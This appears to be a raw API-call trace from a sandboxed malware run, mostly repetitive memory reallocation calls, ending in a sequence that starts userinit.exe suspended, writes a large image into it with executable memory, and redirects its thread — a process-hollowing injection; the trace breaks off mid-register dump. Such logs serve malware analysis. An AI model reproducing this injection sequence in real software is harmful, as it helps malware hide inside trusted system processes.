[0220.178] GlobalUnlock (hMem=0x189000c) returned 0
[0220.178] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0220.178] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.179] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.179] GlobalUnlock (hMem=0x189000c) returned 0
[0220.179] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0220.179] GlobalLock (hMem=0x189000c) returned 0x25f110
[0220.180] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0220.180] GlobalUnlock (hMem=0x189000c) returned 0
[0220.180] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0220.181] GlobalLock (hMem=0x189000c) returned 0x265120
[0220.182] GlobalHandle (pMem=0x265120) returned 0x189000c
[0220.182] GlobalUnlock (hMem=0x189000c) returned 0
[0220.182] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0220.182] GlobalLock (hMem=0x189000c) returned 0x265120
[0220.183] GlobalHandle (pMem=0x265120) returned 0x189000c
[0220.183] GlobalUnlock (hMem=0x189000c) returned 0
[0220.183] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0220.183] GlobalLock (hMem=0x189000c) returned 0x26f130
[0220.184] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0220.184] GlobalUnlock (hMem=0x189000c) returned 0
[0220.184] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0220.184] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.185] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.185] GlobalUnlock (hMem=0x189000c) returned 0
[0220.185] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0220.185] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.186] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.186] GlobalUnlock (hMem=0x189000c) returned 0
[0220.186] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0220.186] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.187] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.187] GlobalUnlock (hMem=0x189000c) returned 0
[0220.187] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0220.187] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.188] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.188] GlobalUnlock (hMem=0x189000c) returned 0
[0220.188] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0220.188] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.189] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.189] GlobalUnlock (hMem=0x189000c) returned 0
[0220.189] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0220.189] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.190] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.190] GlobalUnlock (hMem=0x189000c) returned 0
[0220.190] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0220.190] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.191] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.191] GlobalUnlock (hMem=0x189000c) returned 0
[0220.191] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0220.191] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.192] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.192] GlobalUnlock (hMem=0x189000c) returned 0
[0220.192] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0220.192] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.193] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.193] GlobalUnlock (hMem=0x189000c) returned 0
[0220.193] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0220.193] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.193] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.193] GlobalUnlock (hMem=0x189000c) returned 0
[0220.193] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0220.195] GlobalLock (hMem=0x189000c) returned 0x27b110
[0220.196] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0220.196] GlobalUnlock (hMem=0x189000c) returned 0
[0220.196] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0220.196] GlobalLock (hMem=0x189000c) returned 0x27b110
[0220.197] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0220.197] GlobalUnlock (hMem=0x189000c) returned 0
[0220.197] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0220.199] GlobalLock (hMem=0x189000c) returned 0x29f120
[0220.200] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0220.200] GlobalUnlock (hMem=0x189000c) returned 0
[0220.200] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0220.200] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.200] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.200] GlobalUnlock (hMem=0x189000c) returned 0
[0220.200] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0220.201] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.201] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.201] GlobalUnlock (hMem=0x189000c) returned 0
[0220.201] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0220.201] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.202] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.202] GlobalUnlock (hMem=0x189000c) returned 0
[0220.202] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0220.202] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.203] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.203] GlobalUnlock (hMem=0x189000c) returned 0
[0220.203] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0220.203] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.204] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.204] GlobalUnlock (hMem=0x189000c) returned 0
[0220.204] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0220.204] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.205] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.205] GlobalUnlock (hMem=0x189000c) returned 0
[0220.205] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0220.205] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.206] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.206] GlobalUnlock (hMem=0x189000c) returned 0
[0220.206] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0220.206] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.207] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.207] GlobalUnlock (hMem=0x189000c) returned 0
[0220.207] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0220.207] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.208] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.208] GlobalUnlock (hMem=0x189000c) returned 0
[0220.208] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0220.208] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.209] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.209] GlobalUnlock (hMem=0x189000c) returned 0
[0220.209] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0220.209] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.210] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.210] GlobalUnlock (hMem=0x189000c) returned 0
[0220.210] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0220.210] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.211] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.211] GlobalUnlock (hMem=0x189000c) returned 0
[0220.211] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0220.211] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.211] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.211] GlobalUnlock (hMem=0x189000c) returned 0
[0220.212] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0220.212] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.212] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.212] GlobalUnlock (hMem=0x189000c) returned 0
[0220.212] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0220.212] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.213] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.213] GlobalUnlock (hMem=0x189000c) returned 0
[0220.213] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0220.213] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.214] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.214] GlobalUnlock (hMem=0x189000c) returned 0
[0220.214] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0220.214] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.215] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.215] GlobalUnlock (hMem=0x189000c) returned 0
[0220.215] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0220.215] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.216] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.216] GlobalUnlock (hMem=0x189000c) returned 0
[0220.216] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0220.216] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.217] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.217] GlobalUnlock (hMem=0x189000c) returned 0
[0220.217] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0220.217] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.218] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.218] GlobalUnlock (hMem=0x189000c) returned 0
[0220.218] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0220.218] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.266] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.266] GlobalUnlock (hMem=0x189000c) returned 0
[0220.266] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0220.266] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.267] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.267] GlobalUnlock (hMem=0x189000c) returned 0
[0220.267] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0220.267] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.268] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.268] GlobalUnlock (hMem=0x189000c) returned 0
[0220.268] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0220.268] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.269] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.269] GlobalUnlock (hMem=0x189000c) returned 0
[0220.269] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0220.269] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.270] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.270] GlobalUnlock (hMem=0x189000c) returned 0
[0220.270] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0220.270] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.271] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.271] GlobalUnlock (hMem=0x189000c) returned 0
[0220.271] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0220.271] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.272] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.272] GlobalUnlock (hMem=0x189000c) returned 0
[0220.272] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0220.272] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.273] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x14c, hThread=0x150, dwProcessId=0x944, dwThreadId=0x940)) returned 1
[0220.283] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0220.284] GetThreadContext (in: hThread=0x150, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x2c2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f980, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0220.328] ReadProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x7ffdc008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0220.328] VirtualAllocEx (hProcess=0x14c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0220.328] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1e10000
[0220.329] VirtualAlloc (lpAddress=0x1e10000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e10000
[0220.329] VirtualAlloc (lpAddress=0x1db8000, dwSize=0x58000, flAllocationType=0x1000, flProtect=0x4) returned 0x1db8000
[0220.335] WriteProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x400000, lpBuffer=0x1db5f6c*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1db5f6c*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0220.347] WriteProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x7ffdc008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0220.348] SetThreadContext (hThread=0x150, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f980, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, 